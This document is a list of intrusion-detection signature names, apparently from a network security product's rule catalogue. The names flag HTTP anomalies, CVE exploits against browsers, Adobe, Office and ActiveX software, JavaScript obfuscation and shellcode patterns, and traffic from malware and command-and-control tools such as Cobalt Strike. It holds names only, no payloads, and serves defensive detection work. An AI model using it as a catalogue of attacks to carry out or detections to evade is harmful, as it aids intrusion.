HTTP_SHS-Microsoft-Internet-Explorer-Redirect-Memory-Corruption
HTTP_SHS-Microsoft-Internet-Explorer-URI-Redirection-Security-Bypass
HTTP_SHS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029
HTTP_SHS-Microsoft-Outlook-Express-And-Windows-Mail-MHTML-URL-Parsing-Vulnerability
HTTP_SHS-Microsoft-Windows-MHTML-Information-Disclosure-CVE-2011-0096-3
HTTP_SHS-Microsoft-Windows-Shell-Vulnerability
HTTP_SHS-Microsoft-Windows-Windows-Script-Host-Command-Injection
HTTP_SHS-Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28480
HTTP_SHS-mIRC-URI-Handler-Remote-Code-Execution
HTTP_SHS-Mozilla-Multiple-Products-Multiple-Location-Headers
HTTP_SHS-Multiple-Content-Encodings
HTTP_SHS-Multiple-Gzip-Or-Deflate-Content-Encodings
HTTP_SHS-Multiple-Transfer-Encodings
HTTP_SHS-No-Newline-Before-Content-Encoding
HTTP_SHS-Non-Alphanumeric-Content-Encoding
HTTP_SHS-Non-Alphanumeric-Content-Type
HTTP_SHS-NTLM-Authentication-Usage
HTTP_SHS-Nullsoft-Winamp-Ultravox-Ultravox-Max-Msg-Header-Buffer-Overflow
HTTP_SHS-OPC-UA-HTTP/XML-Shared-Variables
HTTP_SHS-Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion
HTTP_SHS-Oracle-JDeveloper-ADF-Faces-Remote-Resource-Loader-Insecure-Deserialization
HTTP_SHS-Oracle-WebLogic-Server-Session-Fixation
HTTP_SHS-PHP-apache_request_headers-Function-Buffer-Overflow
HTTP_SHS-PHP-HTTP_Fopen_Wrapper-Stack-Buffer-Overflow
HTTP_SHS-Possible-Cobalt-Strike-Response
HTTP_SHS-Possibly-Malicious-Long-Domain-Name-Redirect
HTTP_SHS-Redirect-To-File-URI
HTTP_SHS-Redirect-To-FTP
HTTP_SHS-Redirect-To-UNC-Path
HTTP_SHS-Response-HTTP-2
HTTP_SHS-Server-Version-Number-Disclosure
HTTP_SHS-Set-Browser-Cookie
HTTP_SHS-Set-Cookie2-Header
HTTP_SHS-Shared-Variables
HTTP_SHS-Shared-Variables-2
HTTP_SHS-SHOUTcast-Stream-Usage
HTTP_SHS-Solarwinds-SunBurst-Beacon
HTTP_SHS-Squid-Long-String-Header-Processing-Assertion-Failure
HTTP_SHS-Squid-Proxy-Cache-Update-DoS
HTTP_SHS-Squid-Proxy-HTTP-Vary-Header-Handling-Denial-Of-Service
HTTP_SHS-Strict-Transport-Security-Header
HTTP_SHS-Sundown-Malware-Activity
HTTP_SHS-Suspicious-Multiline-HTTP-Header
HTTP_SHS-Suspicious-Partial-Data-Request-From-Server
HTTP_SHS-Suspicious-Reply
HTTP_SHS-Suspicious-Server-Reply
HTTP_SHS-Suspiciously-Long-Reply-Content-Length-Header
HTTP_SHS-Suspiciously-Long-Reply-Header
HTTP_SHS-TA551-Malware-Infection-Traffic_2
HTTP_SHS-Tinyproxy-HTTP-Connection-Headers-Use-After-Free
HTTP_SHS-Tnftp-Redirection-Command-Execution-CVE-2014-8517
HTTP_SHS-Transfer-Encoding-Chunked
HTTP_SHS-Transfer-Encoding-Compress
HTTP_SHS-Transfer-Encoding-Deflate
HTTP_SHS-Transfer-Encoding-Gzip
HTTP_SHS-Transfer-Encoding-Identity
HTTP_SHS-Transfer-Encoding-Invalid
HTTP_SHS-Transfer-Encoding-lzma
HTTP_SHS-Transfer-Encoding-With-Obsolete-Header-Folding
HTTP_SHS-Unrequested-Partial-Content
HTTP_SHS-Vulnerable-Php-4.3.7
HTTP_SHS-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow
HTTP_SHS-Web-Server-CT-Backdoor-Response
HTTP_SHS-WebSocket-Connection-Reply
HTTP_SHS-Whitespace-Before-Transfer-Encoding
HTTP_SHS-Windows-Helpctr-Exe-Hcp-Url-System-Compromise
HTTP_SHS-X-Php-Originating-Script-Header
HTTP_SHS-Your-Freedom-Network-Response
HTTP_SHS_Squid-Proxy-Digest-Nonce-Information-Disclosure
HTTP_SLS-426-Upgrade-Required
HTTP_SLS-Accepted-Status-Code
HTTP_SLS-Already-Reported-Status-Code
HTTP_SLS-Already-Reported-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Apple-QuickTime-Crafted-HTTP-Error-Response-Buffer-Overflow
HTTP_SLS-Bad-Gateway-Status-Code
HTTP_SLS-Bad-Request-Status-Code
HTTP_SLS-Conflict-Status-Code
HTTP_SLS-Conflict-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Continue-Status-Code
HTTP_SLS-Continue-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Created-Status-Code
HTTP_SLS-Embedthis-GoAhead-Web-Server-File-Upload-Denial-Of-Service
HTTP_SLS-Entity-Too-Large-Status-Code
HTTP_SLS-Entity-Too-Large-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Expectation-Failed-Status-Code
HTTP_SLS-Expectation-Failed-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Failed-Dependency-Status-Code
HTTP_SLS-Failed-Dependency-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Forbidden-Status-Code
HTTP_SLS-Gateway-Timeout-Status-Code
HTTP_SLS-Gateway-Timeout-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-GetGo-Download-Manager-HTTP-Response-Buffer-Overflow
HTTP_SLS-Gone-Status-Code
HTTP_SLS-Gone-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Header-In-Status-Line
HTTP_SLS-HTTP-0.9-Response-After-HTTP-1.x
HTTP_SLS-HTTP-Version-Not-Supported-Status-Code
HTTP_SLS-HTTP-Version-Not-Supported-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Informal-Status-With-HTTP-Version-1.0
HTTP_SLS-Insufficient-Storage-Status-Code
HTTP_SLS-Insufficient-Storage-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Internal-Error-Status-Code
HTTP_SLS-Invalid-Status-Line
HTTP_SLS-Length-Required-Status-Code
HTTP_SLS-Length-Required-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Locked-Status-Code
HTTP_SLS-Locked-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Loop-Detected-Status-Code
HTTP_SLS-Loop-Detected-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Method-Not-Allowed-Status-Code
HTTP_SLS-Method-Not-Allowed-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Microsoft-Internet-Explorer-HTTP-Response-Double-Free-Memory-Corruption
HTTP_SLS-Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849
HTTP_SLS-Moved-Permanently-Status-Code
HTTP_SLS-Moved-Temporarily-Status-Code
HTTP_SLS-Multi-Status-Code
HTTP_SLS-Multi-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Multiple-Choices-Status-Code
HTTP_SLS-No-Content-Status-Code
HTTP_SLS-Non-Authoritative-Information-Status-Code
HTTP_SLS-Non-Authoritative-Information-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Not-Acceptable-Status-Code
HTTP_SLS-Not-Acceptable-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Not-Found-Status-Code
HTTP_SLS-Not-Implemented-Status-Code
HTTP_SLS-Not-Modified-Status-Code
HTTP_SLS-Octopus-C2-Infection-Traffic
HTTP_SLS-Partial-Content-Status-Code
HTTP_SLS-Permanent-Redirect-Status-Code
HTTP_SLS-Precondition-Failed-Status-Code
HTTP_SLS-Precondition-Failed-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Processing-Status-Code
HTTP_SLS-Processing-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Proxy-Authentication-Required-Status-Code
HTTP_SLS-Proxy-Authentication-Required-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Request-Timeout-Status-Code
HTTP_SLS-Request-Timeout-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Requested-Range-Not-Satisfiable-Status-Code
HTTP_SLS-Requested-Range-Not-Satisfiable-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Reset-Content-Status-Code
HTTP_SLS-Reset-Content-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Security-Management-Center-Failed-Login
HTTP_SLS-See-Other-Status-Code
HTTP_SLS-See-Other-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Service-Unavailable-Status-Code
HTTP_SLS-Shared-Variables
HTTP_SLS-Squid-Proxy-Invalid-HTTP-Response-Status-Code-DOS
HTTP_SLS-Successful-Status-Code
HTTP_SLS-Suspicious-File-Transfer
HTTP_SLS-Suspicious-Permanent-Site-Move
HTTP_SLS-Suspicious-Temporary-Site-Move
HTTP_SLS-Switching-Protocols-Status-Code
HTTP_SLS-Switching-Protocols-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Temporary-Redirect-Status-Code
HTTP_SLS-Temporary-Redirect-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Too-Many-Requests-Code
HTTP_SLS-Too-Many-Requests-Code-In-HTTP-1.0-Response
HTTP_SLS-Unauthorized-Status-Code
HTTP_SLS-Uncommon-Status-Code-999
HTTP_SLS-Unknown-Client-Error-Status-Code
HTTP_SLS-Unknown-Informal-Status-Code
HTTP_SLS-Unknown-Redirection-Status-Code
HTTP_SLS-Unknown-Server-Error-Status-Code
HTTP_SLS-Unknown-Status-Code
HTTP_SLS-Unknown-Success-Status-Code
HTTP_SLS-Unprocessable-Entity-Status-Code
HTTP_SLS-Unprocessable-Entity-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Unsupported-Media-Type-Status-Code
HTTP_SLS-Unsupported-Media-Type-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-URI-Too-Large-Status-Code
HTTP_SLS-URI-Too-Large-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Use-Proxy-Status-Code
HTTP_SLS-Use-Proxy-Status-Code-In-HTTP-1.0-Response
HTTP_SLS-Vundo-Traffic
HTTP_SOAP-URL
HTTP_SOAP_Without_POST
HTTP_Sophos-Anti-Virus-CHM-File-Heap-Overflow
HTTP_SS-ACDSee-XBM-Header-Name-Buffer-Overflow
HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow-2
HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Plugin-Object-Reloading-Memory-Corruption
HTTP_SS-Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow
HTTP_SS-Adobe-Acrobat-Cooltype-Sing-Buffer-Overflow
HTTP_SS-Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
HTTP_SS-Adobe-Acrobat-CustomDictionaryOpen-BOF
HTTP_SS-Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow
HTTP_SS-Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow-2
HTTP_SS-Adobe-Acrobat-Flatedecode-Integer-Overflow
HTTP_SS-Adobe-Acrobat-Font-Processing-Memory-Corruption
HTTP_SS-Adobe-Acrobat-GetAnnots-Memory-Corruption
HTTP_SS-Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow
HTTP_SS-Adobe-Acrobat-JPXDecode-Memory-Corruption
HTTP_SS-Adobe-Acrobat-Media-Newplayer-Code-Execution
HTTP_SS-Adobe-Acrobat-PDF-Formatstring
HTTP_SS-Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow
HTTP_SS-Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution
HTTP_SS-Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
HTTP_SS-Adobe-Acropdf-ActiveX-Control-Memory-Corruption
HTTP_SS-Adobe-Audition-Session-File-Stack-Buffer-Overflow
HTTP_SS-Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow
HTTP_SS-Adobe-authplay.dll-CVE-2010-1297-Exploit
HTTP_SS-Adobe-authplay.dll-CVE-2010-1297-Exploit-2
HTTP_SS-Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow
HTTP_SS-Adobe-Flash-ActiveX-Buffer-Overflow
HTTP_SS-Adobe-Flash-Embedded-In-OLE-Document-Download
HTTP_SS-Adobe-Flash-Embedded-In-PDF-Download
HTTP_SS-Adobe-Flash-Exploit-CVE-2010-3643
HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0609
HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0609-2
HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0611
HTTP_SS-Adobe-Flash-Media-Download
HTTP_SS-Adobe-Flash-Player-For-Linux-Actionscript-Asnative-Command-Execution
HTTP_SS-Adobe-Flash-Player-Function-Variables-Information-Disclosure
HTTP_SS-Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution
HTTP_SS-Adobe-Flash-Player-JPG-Embedded-SWF-Processing-Heap-Overflow
HTTP_SS-Adobe-Flash-Player-SWF-File-Code-Execution
HTTP_SS-Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow
HTTP_SS-Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow
HTTP_SS-Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow
HTTP_SS-Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware
HTTP_SS-Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow
HTTP_SS-Adobe-Reader-BMP-Multiple-Vulnerabilities
HTTP_SS-Adobe-Reader-BMP-Vulnerability-2011-2438c
HTTP_SS-Adobe-Reader-Iff-Rgba-Chunk-Buffer-Overflow
HTTP_SS-Adobe-Reader-Integer-Overflow-CVE-2010-2862
HTTP_SS-Adobe-Reader-JavaScript-Vulnerability-2011-2442
HTTP_SS-Adobe-Reader-JPEG-Multiple-App0-Markers
HTTP_SS-Adobe-Reader-Pcx-Height-Integer-Overflow
HTTP_SS-Adobe-Reader-Printseps-Memory-Corruption
HTTP_SS-Adobe-Reader-U3D-CLODMeshDeclaration-Shading-Count-Buffer-Overflow
HTTP_SS-Adobe-Shockwave-Director-File-Key-Chunk-Parsing-Buffer-Overflow
HTTP_SS-Adobe-Shockwave-Director-PAMM-Chunk-Memory-Corruption
HTTP_SS-Adobe-Shockwave-Player-DIR-Files-PAMI-Chunk-Code-Execution
HTTP_SS-Adobe-Shockwave-Player-Lnam-Chunk-Processing-Buffer-Overflow
HTTP_SS-Adobe-Shockwave-Player-PAMI-Chunk-Parsing-Memory-Corruption
HTTP_SS-Adobe-Shockwave-Player-rcsL-Corruption
HTTP_SS-Adobe-ShockwavePlayer-DirectorFile-RecordParsing-RemoteCodeExecution
HTTP_SS-Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow
HTTP_SS-America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Called
HTTP_SS-AOL-Instant-Messenger-Away-Message-Buffer-Overflow
HTTP_SS-AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow
HTTP_SS-AOL-Radio-AmpX-ActiveX-Control-Buffer-Overflow
HTTP_SS-AOL-Radio-AmpX-ActiveX-Control-ControlFile-Buffer-Overflow
HTTP_SS-AOL-SuperBuddy-ActiveX-Control-Function-Deference
HTTP_SS-Apple-iTunes-M3u-Playlist-Handling-Buffer-Overflow
HTTP_SS-Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow
HTTP_SS-Apple-iTunes-PLS-Playlist-Handling-Buffer-Overflow
HTTP_SS-Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow
HTTP_SS-Apple-QuickTime-And-iTunes-Heap-Memory-Corruption
HTTP_SS-Apple-QuickTime-FlashPix-Movie-File-Integer-Overflow
HTTP_SS-Apple-QuickTime-Image-Description-Atom-Sign-Extension-Memory-Corruption
HTTP_SS-Apple-QuickTime-Image-Descriptor-Atom-Parsing-Memory-Corruption
HTTP_SS-Apple-QuickTime-Media-Download
HTTP_SS-Apple-QuickTime-Obji-Atom-Parsing-Stack-Buffer-Overflow
HTTP_SS-Apple-QuickTime-Pict-Image-Paintpoly-Parsing-Heap-Buffer-Overflow
HTTP_SS-Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer
HTTP_SS-Apple-QuickTime-RTSP-URI-Buffer-Overflow
HTTP_SS-Apple-QuickTime-SMIL-File-Handling-Integer-Overflow
HTTP_SS-Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow
HTTP_SS-Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption
HTTP_SS-Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
HTTP_SS-Apple-Safari-Right-To-Left-Text-Rendering-Use-After-Free
HTTP_SS-Apple-Safari-Webkit-Button-First-Letter-Style-Rendering-Code-Execution
HTTP_SS-Apple-Safari-Webkit-Floating-Point-Buffer-Overflow
HTTP_SS-Apple-Safari-Webkit-Floating-Point-Data-Type-Code-Execution
HTTP_SS-Apple-Safari-Webkit-Menu-Onchange-Memory-Corruption
HTTP_SS-Apple-Safari-Webkit-Range-Object-Remote-Code-Execution
HTTP_SS-Apple-Safari-Webkit-Selections-Use-After-Free
HTTP_SS-Apple-Software-Update-Remote-Command-Execution
HTTP_SS-Ask-Toolbar-ActiveX-Control-ShortFormat-Property-Buffer-Overflow
HTTP_SS-Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow
HTTP_SS-AtHoc-IWSAlerts-ActiveX-Control-Buffer-Overflow
HTTP_SS-Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service
HTTP_SS-Aurigma-Image-Uploader-Buffer-Overflow
HTTP_SS-Autodesk-IDrop-ActiveX-Control-Control-Buffer-Overflow
HTTP_SS-Autodesk-Liveupdate-ActiveX-Control-Code-Execution
HTTP_SS-Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
HTTP_SS-Avast-AntiVirus-Engine-Lha-Buffer-Overflow
HTTP_SS-AVI-MS09-038
HTTP_SS-Axis-Communications-Camera-Control-ActiveX-Object
HTTP_SS-Baidu-Soba-Search-Bar-File-Download-And-Execute
HTTP_SS-BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow
HTTP_SS-BaoFeng-Storm-ActiveX-Control-Multiple-Methods-Buffer-Overflow-2
HTTP_SS-Base64-Encoded-HTML-Object
HTTP_SS-BitDefender-AntiVirus-PDF-Processing-Memory-Corruption
HTTP_SS-BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow
HTTP_SS-BitTorrent-Torrent-Metainfo-File-Download
HTTP_SS-BZip2-Compressed-File-Download
HTTP_SS-CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution
HTTP_SS-CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow
HTTP_SS-CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation
HTTP_SS-CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF
HTTP_SS-CA-Multiple-Products-gui-cm-ctrls-ActiveX-Control-Memory-Corruption
HTTP_SS-Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution
HTTP_SS-Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution
HTTP_SS-Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF
HTTP_SS-Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation
HTTP_SS-Citrix-Program-Neighborhood-Agent-Buffer-Overflow
HTTP_SS-Clamav-AntiVirus-Check-JPEG-Exploit-Function-Denial-Of-Service
HTTP_SS-Clamav-AntiVirus-CHM-File-Handling-Denial-Of-Service
HTTP_SS-Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow
HTTP_SS-Clamav-libclamav-PE-File-Handling-Integer-Overflow
HTTP_SS-Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite
HTTP_SS-CoolPlayer-Playlist-File-Handling-Buffer-Overflow
HTTP_SS-Core-Services-Memory-Corruption-CVE-2010-2561
HTTP_SS-Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow
HTTP_SS-Debian-Binary-Installation-Package-Download
HTTP_SS-DjVu-ActiveX-Control-Buffer-Overflow
HTTP_SS-Downloader-Malware
HTTP_SS-E-Book-Systems-FlipViewer-ActiveX-Control-Buffer-Overflow
HTTP_SS-EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method
HTTP_SS-EDraw-Office-Viewer-ActiveX-Control-Vulnerable-OpenWebFile-Method-Call
HTTP_SS-EICAR-AntiVirus-Test-File
HTTP_SS-Electronic-Arts-SnoopyCtrl-ActiveX-Control-Control-Buffer-Overflow
HTTP_SS-Embedded-ActiveX-Object-In-HTML
HTTP_SS-Embedded-Java-Applet-In-HTML
HTTP_SS-EMC-Captiva-PixTools-ActiveX-Control-File-Creation
HTTP_SS-EMC-Captiva-QuickScan-Pro-Keyhelp-ActiveX-Control-Buffer-Overflow
HTTP_SS-Encoded-Client-Side-Script
HTTP_SS-Encoded-JavaScript-In-PDF
HTTP_SS-Estsoft-Alzip-Mim-File-Processing-Buffer-Overflow
HTTP_SS-Excel-Insufficient-Record-Validation-Vulnerability-CVE-2011-1272
HTTP_SS-Excel-Memory-Corruption-CVE-2010-0823
HTTP_SS-Facebook-Photo-Uploader-ActiveX-Control-FileMask-Method-BOF
HTTP_SS-FFmpeg-OGV-File-Format-Memory-Corruption
HTTP_SS-FFmpeg-Vmd_Read_Header-Integer-Overflow
HTTP_SS-Firefox-Browser-XUL-Frame-Tree-Memory-Corruption
HTTP_SS-Firefox-Gif-Netscape-Extension-BOF
HTTP_SS-Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows
HTTP_SS-Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow
HTTP_SS-GOM-Player-ActiveX-Control-OpenURL-Method-Buffer-Overflow
HTTP_SS-Google-Apps-Mailto-URI-Argument-Injection
HTTP_SS-Google-Chrome-CRX-Extension-Package-Download
HTTP_SS-Google-Chrome-GURL-Cross-Origin-Bypass
HTTP_SS-Green-Dam-Youth-Escort-Long-URI-Handling-Buffer-Overflow
HTTP_SS-Gzip-Compressed-File-Download
HTTP_SS-HP-HpqUtil-ActiveX-Component-ListFiles-Method-Buffer-Overflow
HTTP_SS-HP-Info-Center-ActiveX-Control-Absolute-Path-Traversal
HTTP_SS-HP-Info-Center-ActiveX-Control-Registry-Access
HTTP_SS-HP-LoadRunner-Xupload-ActiveX-Control-Arbitrary-File-Download
HTTP_SS-HP-LoadRunner-Xupload-ActiveX-Control-Buffer-Overflow
HTTP_SS-HP-Mercury-TestDirector-ActiveX-Control-Buffer-Overflow
HTTP_SS-HP-Software-Update-HPeDiag-ActiveX-Control-Buffer-Overflow
HTTP_SS-HTML-Null-Character-Evasion-Method
HTTP_SS-IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow
HTTP_SS-IBM-Informix-Client-SDK-NFX-File-Processing-Stack-Buffer-Overflow
HTTP_SS-IBM-Installation-Manager-IIM-URI-Handling-Code-Execution
HTTP_SS-IBM-Lotus-Domino-Web-Access-ActiveX-Control-Buffer-Overflow
HTTP_SS-IBM-Lotus-Expeditor-cai-URI-Handler-Command-Execution
HTTP_SS-IDAutomation-Barcode-ActiveX-Components-File-Write
HTTP_SS-Indexing-Service-Memory-Corruption-CVE-2009-2507
HTTP_SS-Internet-Explorer-8-Developer-Tools-Code-Execution-CVE-2010-0811
HTTP_SS-Internet-Explorer-Cached-Objects-Zone-Bypass
HTTP_SS-Internet-Explorer-CreateTextRange-Vulnerability-2
HTTP_SS-Internet-Explorer-CreateTextRange-Vulnerability-3
HTTP_SS-Internet-Explorer-Daxctle.ocx-KeyFrame-Method-Memory-Corruption
HTTP_SS-Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption
HTTP_SS-Internet-Explorer-HTML-Elements-Buffer-Overflow
HTTP_SS-Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption
HTTP_SS-Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption
HTTP_SS-Internet-Explorer-Object-Tag-Popup
HTTP_SS-Internet-Explorer-Object-Type-Open-Window
HTTP_SS-Internet-Explorer-Scroll-Event-Remote-Code-Execution
HTTP_SS-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
HTTP_SS-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557
HTTP_SS-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559
HTTP_SS-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation-Memory-Corruption
HTTP_SS-Iseemedia-LPViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow
HTTP_SS-ISO-MPEG-4-Download
HTTP_SS-Java-Unsigned-Applet-Execution
HTTP_SS-JavaScript-Dual-Custom-Function-Obfuscation-Method
HTTP_SS-JavaScript-Escaped-Obfuscation-Method
HTTP_SS-JavaScript-In-PDF
HTTP_SS-JavaScript-Packed-Obfuscation-Method
HTTP_SS-JavaScript-Self-Reference
HTTP_SS-JavaScript-ShellCode-Generation
HTTP_SS-JavaScript-ShellCode-Generation-2
HTTP_SS-JavaScript-ShellCode-Generation-3
HTTP_SS-JavaScript-ShellCode-Generation-4
HTTP_SS-JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation
HTTP_SS-JavaScript-Unescape-Obfuscation-Method
HTTP_SS-JavaScript-Unescape-Obfuscation-Method-2
HTTP_SS-JavaScript-With-Open-Action-In-PDF
HTTP_SS-JavaScript-Xor-Obfuscation-Method
HTTP_SS-JavaScript-Xor-One-Time-Pad-Obfuscation-Method
HTTP_SS-Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow
HTTP_SS-Launch-Command-In-PDF
HTTP_SS-Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow
HTTP_SS-Libpng-PNG-Image-BOF
HTTP_SS-Libsndfile-PAF-File-Integer-Overflow
HTTP_SS-Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
HTTP_SS-LinkedIn-Internet-Explorer-Toolbar-IEContextMenu-ActiveX-Control-BOF
HTTP_SS-Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow
HTTP_SS-Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow
HTTP_SS-Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow
HTTP_SS-Lupper-Worm-Download
HTTP_SS-Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow
HTTP_SS-Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution
HTTP_SS-Macrovision-InstallShield-Update-Service-Agent-ActiveX-Memory-Corruption
HTTP_SS-Malicious-BMP-File-CVE-2009-2518
HTTP_SS-Malicious-Java-Applet-Reference
HTTP_SS-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog-BOF
HTTP_SS-McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow
HTTP_SS-Metasploit-JavaScript-Encryption
HTTP_SS-Metasploit-JavaScript-Escape-Evasion
HTTP_SS-MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow
HTTP_SS-Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution
HTTP_SS-Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
HTTP_SS-Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow
HTTP_SS-Microsoft-ATL-COM-Initialization
HTTP_SS-Microsoft-ATL-Uninitialized-Object
HTTP_SS-Microsoft-Color-Management-System-Crafted-Path-Name-Buffer-Overflow
HTTP_SS-Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252
HTTP_SS-Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution
HTTP_SS-Microsoft-DirectShow-Audio-Decoder-Stack-Overflow
HTTP_SS-Microsoft-DirectShow-Heap-Overflow
HTTP_SS-Microsoft-DirectShow-QuickTime-Movie-Parsing-Code-Execution
HTTP_SS-Microsoft-DirectShow-Remote-Code-Execution
HTTP_SS-Microsoft-DirectX-Sami-File-Parsing-Code-Execution
HTTP_SS-Microsoft-DirectX-Sami-Format-Parsing-Code-Execution
HTTP_SS-Microsoft-DirectX-WAV-And-AVI-File-Parsing-Code-Execution
HTTP_SS-Microsoft-Embedded-OpenType-Font-Engine-Heap-Overflow
HTTP_SS-Microsoft-Embedded-OpenType-Font-Engine-Integer-Overflow
HTTP_SS-Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-0978
HTTP_SS-Microsoft-Excel-Array-Indexing-Vulnerability-CVE-2011-1990
HTTP_SS-Microsoft-Excel-Axisparent-Record-Index-Handling-Code-Execution
HTTP_SS-Microsoft-Excel-Buffer-Overrun-Vulnerability-CVE-2011-1276
HTTP_SS-Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability
HTTP_SS-Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution
HTTP_SS-Microsoft-Excel-Crafted-Picture-Record-Code-Execution
HTTP_SS-Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980
HTTP_SS-Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105
HTTP_SS-Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution
HTTP_SS-Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264
HTTP_SS-Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
